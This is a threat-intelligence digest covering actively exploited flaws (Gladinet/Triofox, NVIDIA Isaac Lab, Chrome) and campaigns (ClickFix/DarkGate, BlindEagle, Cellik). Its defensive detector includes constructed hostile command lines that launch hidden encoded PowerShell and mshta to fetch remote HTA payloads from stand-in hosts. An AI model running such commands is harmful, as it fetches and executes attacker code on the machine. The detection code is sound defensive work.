Gladinet/Triofox RCE exploitation 🚨, parked domains malware 🌐, ClickFix DarkGate delivery 💀, Cellik Android RAT 📱, BlindEagle Colombia targeting 🎯

Daily Threat Intel Digest - December 17, 2025

🔴 Critical Threats & Active Exploitation

[NEW] CISA Warns of Actively Exploited Hardcoded Keys in Gladinet CentreStack/Triofox
Attackers are exploiting hardcoded cryptographic keys in the Gladinet CentreStack and Triofox file-sharing platforms to achieve remote code execution without authentication. The flaw (CVE-2025-14611) also permits Local File Inclusion, enabling data theft and full system compromise. CISA added it to the KEV catalog with a federal remediation deadline of January 5, 2026, but urges all organizations to patch immediately because exploitation is already underway [CyberPress; GBHackers]. Over 80,000 organizations use these platforms for secure file sharing. Because the weakness is a key shared across installs rather than a bug an attacker must find per target, any internet-exposed instance that sat unpatched should be treated as a candidate for compromise assessment, not just patched.

[NEW] Critical RCE in NVIDIA Isaac Lab Exploited in the Wild
A deserialization flaw (CVE-2025-32210) in NVIDIA's Isaac Lab robotics simulation framework enables unauthenticated remote code execution (CVSS 9.0). Systems running versions earlier than 2.3.0, on any platform, can be hijacked to steal sensitive AI research data or deploy ransomware. NVIDIA confirmed active exploitation and urged immediate upgrade; the attackers' identity is not yet known [CyberPress; GBHackers].

[NEW] Parked Domains Become Primary Malware Distribution Channel
New Infoblox research finds that over 90% of visits to parked domains now lead to malware, scams, or phishing, up from under 5% a decade ago. Attackers abuse "direct search" advertising models and cloaking to route real users (not scanners) through multi-layered traffic distribution systems that deliver Tedy malware, credential theft, and scams. Major brands such as Netflix, Gmail, and Scotiabank are typosquatted, and one actor controls 80,000+ domains using "double fast flux" DNS (rapidly rotating both the A records and the nameserver records) to resist takedowns [CyberPress; GBHackers].

[UPDATE] Chrome Emergency Update Patches Actively Exploited RCE Flaws
Google released Chrome 143.0.7499.146/.147 to address two high-severity vulnerabilities: CVE-2025-14765 (use-after-free in WebGPU) and CVE-2025-14766 (out-of-bounds read/write in V8). Both can lead to remote code execution; the first earned a $10,000 bounty. Bug details stay restricted until the update reaches most users, and the urgent out-of-band rollout signals active exploitation risk, continuing the run of Chrome zero-day attacks flagged in prior reporting [CyberPress; GBHackers].

🎯 Threat Actor Activity & Campaigns

[NEW] “ClickFix” Social Engineers Deliver DarkGate via Fake Browser Alerts
A new campaign tricks users into running malicious PowerShell by spoofing a "Word Online extension not installed" error. The lure page places an obfuscated PowerShell command on the clipboard and instructs the victim to paste it into the Windows Run dialog; that command stages DarkGate through HTA files and AutoIt scripts. Clipboard manipulation and multi-stage payloads help evade detection, mapping to MITRE ATT&CK T1059.001 (PowerShell) and T1027 (Obfuscated Files or Information) [CyberPress; GBHackers].
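The defining artifact of a ClickFix chain is where the interpreter gets launched from: a command pasted into Win+R runs as a child of explorer.exe. The detector below, an added example that is not code from the digest or its sources, scores constructed process-creation events on that parent/child pair plus the staging flags the campaign uses (hidden window, -EncodedCommand, mshta/HTA, AutoIt). The events, hostnames and indicator list are assumptions written for this illustration; the decoding of -EncodedCommand (base64 over UTF-16LE) is how powershell.exe actually reads that switch.

```python
"""ClickFix-style process-chain detector over constructed process-creation events.

ClickFix lures push a command onto the clipboard and tell the victim to paste it
into Win+R.  Anything launched that way has explorer.exe as its parent, so the
combination "explorer.exe -> script interpreter" plus obfuscation or staging
flags is a cheap, high-signal hunt.  The events below are constructed, not
real telemetry.
"""
import base64
import re
from typing import Optional


def encode_ps(cmd: str) -> str:
    """UTF-16LE then base64: the encoding powershell.exe -EncodedCommand expects."""
    return base64.b64encode(cmd.encode("utf-16-le")).decode("ascii")


# Constructed sample events: (parent image, image, command line).
SAMPLE_EVENTS = [
    # 0. ClickFix: pasted into Run, hidden window, encoded mshta stage (HTA, as in the DarkGate chain)
    ("C:\\Windows\\explorer.exe",
     "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "powershell.exe -w hidden -nop -enc "
     + encode_ps("mshta http://example.invalid/update.hta")),
    # 1. Benign: user opened PowerShell from the Start menu
    ("C:\\Windows\\explorer.exe",
     "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\""),
    # 2. Benign: scheduled task running a script, no explorer.exe parent
    ("C:\\Windows\\System32\\svchost.exe",
     "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "powershell.exe -NoProfile -File C:\\scripts\\backup.ps1"),
    # 3. ClickFix variant invoking mshta directly from Run
    ("C:\\Windows\\explorer.exe",
     "C:\\Windows\\System32\\mshta.exe",
     "mshta.exe https://example.invalid/verify.hta"),
]

INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}

# Regex -> human-readable indicator (assumed list for this example).  Matched against
# the raw command line and, when present, the decoded -EncodedCommand payload.
INDICATORS = {
    r"\bmshta\b": "mshta launched (HTA stage)",
    r"\.hta\b": "HTA file referenced",
    r"\b(iex|invoke-expression)\b": "Invoke-Expression",
    r"downloadstring|invoke-webrequest|\biwr\b|\bcurl\b": "remote download primitive",
    r"-w(indowstyle)?\s+hidden": "hidden window",
    r"-nop\b|-noprofile": "-NoProfile",
    r"-ep\s+bypass|-executionpolicy\s+bypass": "execution policy bypass",
    r"autoit3|\.a3x\b": "AutoIt interpreter or script",
}

ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload, or None if absent or malformed."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(parent_image: str, image: str, cmdline: str) -> dict:
    """Score one event; 'suspicious' needs the Run-dialog parent plus at least one payload indicator."""
    parent = parent_image.rsplit("\\", 1)[-1].lower()
    proc = image.rsplit("\\", 1)[-1].lower()
    result = {"suspicious": False, "reasons": [], "decoded": None}
    if proc not in INTERPRETERS:
        return result
    if parent == "explorer.exe":
        result["reasons"].append("interpreter spawned by explorer.exe (Run dialog)")
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        result["decoded"] = decoded
        result["reasons"].append("-EncodedCommand present")
    haystack = cmdline + " " + (decoded or "")
    for pattern, label in INDICATORS.items():
        if re.search(pattern, haystack, re.IGNORECASE):
            result["reasons"].append(label)
    result["suspicious"] = parent == "explorer.exe" and len(result["reasons"]) >= 2
    return result


def scan(events) -> list:
    """Return one alert dict (index plus analysis) for every suspicious event."""
    alerts = []
    for i, (parent, image, cmdline) in enumerate(events):
        verdict = analyze_event(parent, image, cmdline)
        if verdict["suspicious"]:
            alerts.append({"index": i, **verdict})
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert["index"], "; ".join(alert["reasons"]), alert["decoded"])
```

Requiring the explorer.exe parent and a second indicator keeps a user who simply opens PowerShell from the Start menu out of the alert set (event 1) while still catching both the encoded PowerShell and the direct mshta variant. On a host, the Run dialog also leaves its history under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, which is worth pulling during triage to recover the pasted command verbatim.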

[NEW] BlindEagle Targets Colombian Government with Caminho Downloader
BlindEagle (APT-C-36) compromised an email account at Colombia's Ministry of Commerce and used it for spear-phishing that delivers DCRat via the Caminho downloader. The chain uses fraudulent judicial portals, nested JavaScript and PowerShell scripts, and steganography that hides payloads inside PNG files. DCRat uses AES-256 encryption and certificate-based C2 authentication, while Caminho's Portuguese-language code points to Brazilian cybercrime origins [CyberPress; Zscaler Research].
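When a downloader hides its next stage in a PNG, the cheapest triage is structural: walk the chunk table and look for data that no image viewer would ever render. The walker below is an added example, not code from the digest, Zscaler, or the Caminho chain, and it assumes the payload sits in one of the two usual places (bytes appended after IEND, or a private or oversized ancillary chunk); the sample images are built in code. It will not catch LSB embedding inside the pixel data, which needs statistical tests.

```python
"""Structural triage of PNG files suspected of carrying a hidden payload.

Steganographic droppers most often stash data where image viewers never look:
appended after the IEND chunk, or inside private or oversized ancillary chunks.
This walker flags both.  It does not detect LSB embedding in pixel data, which
needs statistical tests.  The sample images below are constructed in code.
"""
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
KNOWN_CHUNKS = {
    b"IHDR", b"PLTE", b"IDAT", b"IEND", b"tRNS", b"cHRM", b"gAMA", b"iCCP", b"sBIT",
    b"sRGB", b"tEXt", b"zTXt", b"iTXt", b"bKGD", b"hIST", b"pHYs", b"sPLT", b"tIME",
    b"eXIf", b"acTL", b"fcTL", b"fdAT",
}
TEXT_CHUNKS = {b"tEXt", b"zTXt", b"iTXt"}
TEXT_LIMIT = 4096  # assumption: text metadata larger than this deserves a look


def make_chunk(ctype: bytes, data: bytes) -> bytes:
    """length + type + data + CRC32(type + data), per the PNG spec."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def build_png(extra_chunks=(), trailer=b"") -> bytes:
    """1x1 grayscale PNG, with optional extra chunks before IEND and bytes after it."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    idat = zlib.compress(b"\x00\x00")  # filter byte + one pixel
    body = make_chunk(b"IHDR", ihdr) + make_chunk(b"IDAT", idat)
    for ctype, data in extra_chunks:
        body += make_chunk(ctype, data)
    return PNG_SIG + body + make_chunk(b"IEND", b"") + trailer


def iter_chunks(data: bytes):
    """Yield (type, payload, crc_ok, offset, next_offset); stop at IEND or truncation."""
    pos = len(PNG_SIG)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        start, end = pos + 8, pos + 8 + length
        if end + 4 > len(data):  # declared length runs past end of file
            yield ctype, data[start:], False, pos, len(data)
            return
        payload = data[start:end]
        (crc,) = struct.unpack(">I", data[end:end + 4])
        crc_ok = crc == (zlib.crc32(ctype + payload) & 0xFFFFFFFF)
        yield ctype, payload, crc_ok, pos, end + 4
        pos = end + 4
        if ctype == b"IEND":
            return


def find_anomalies(data: bytes) -> list:
    """Return human-readable findings; an empty list means the structure looks clean."""
    if not data.startswith(PNG_SIG):
        return ["not a PNG: bad signature"]
    findings = []
    end_of_image = None
    for ctype, payload, crc_ok, off, nxt in iter_chunks(data):
        name = ctype.decode("latin-1")
        if not crc_ok:
            findings.append(f"{name} at {off}: bad CRC or truncated chunk")
        if ctype not in KNOWN_CHUNKS:
            findings.append(f"unknown chunk {name} at {off} ({len(payload)} bytes)")
        if ctype in TEXT_CHUNKS and len(payload) > TEXT_LIMIT:
            findings.append(f"oversized {name} at {off} ({len(payload)} bytes)")
        if ctype == b"IEND":
            end_of_image = nxt
    if end_of_image is None:
        findings.append("no IEND chunk")
    elif end_of_image < len(data):
        trailing = data[end_of_image:]
        findings.append(f"{len(trailing)} bytes after IEND (starts {trailing[:4]!r})")
    return findings


# Constructed samples for this example
CLEAN = build_png()
APPENDED = build_png(trailer=b"MZ\x90\x00" + b"\x00" * 64)  # payload glued after IEND
STASHED = build_png(extra_chunks=[(b"prVt", b"\x00" * 3000),
                                  (b"tEXt", b"Comment\x00" + b"A" * 5000)])

if __name__ == "__main__":
    for label, img in (("clean", CLEAN), ("appended", APPENDED), ("stashed", STASHED)):
        print(label, find_anomalies(img) or "ok")
```

The appended-after-IEND case is the one to check first: the image still opens normally, so a visual review proves nothing, while the trailing bytes often start with a recognizable header or a fixed XOR pattern that the downloader strips before execution.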

[NEW] Cellik Android RAT Automates Play Store App Infection
A new malware-as-a-service offering called Cellik lets attackers inject spyware into legitimate Google Play apps with a one-click APK builder. For $150/month it provides live screen streaming, notification interception, hidden browser activity, and credential theft through overlays. The malware claims to bypass Play Protect and has already been seen in trojanized apps, raising the risk for Android users who sideload APKs [CyberPress; BleepingComputer].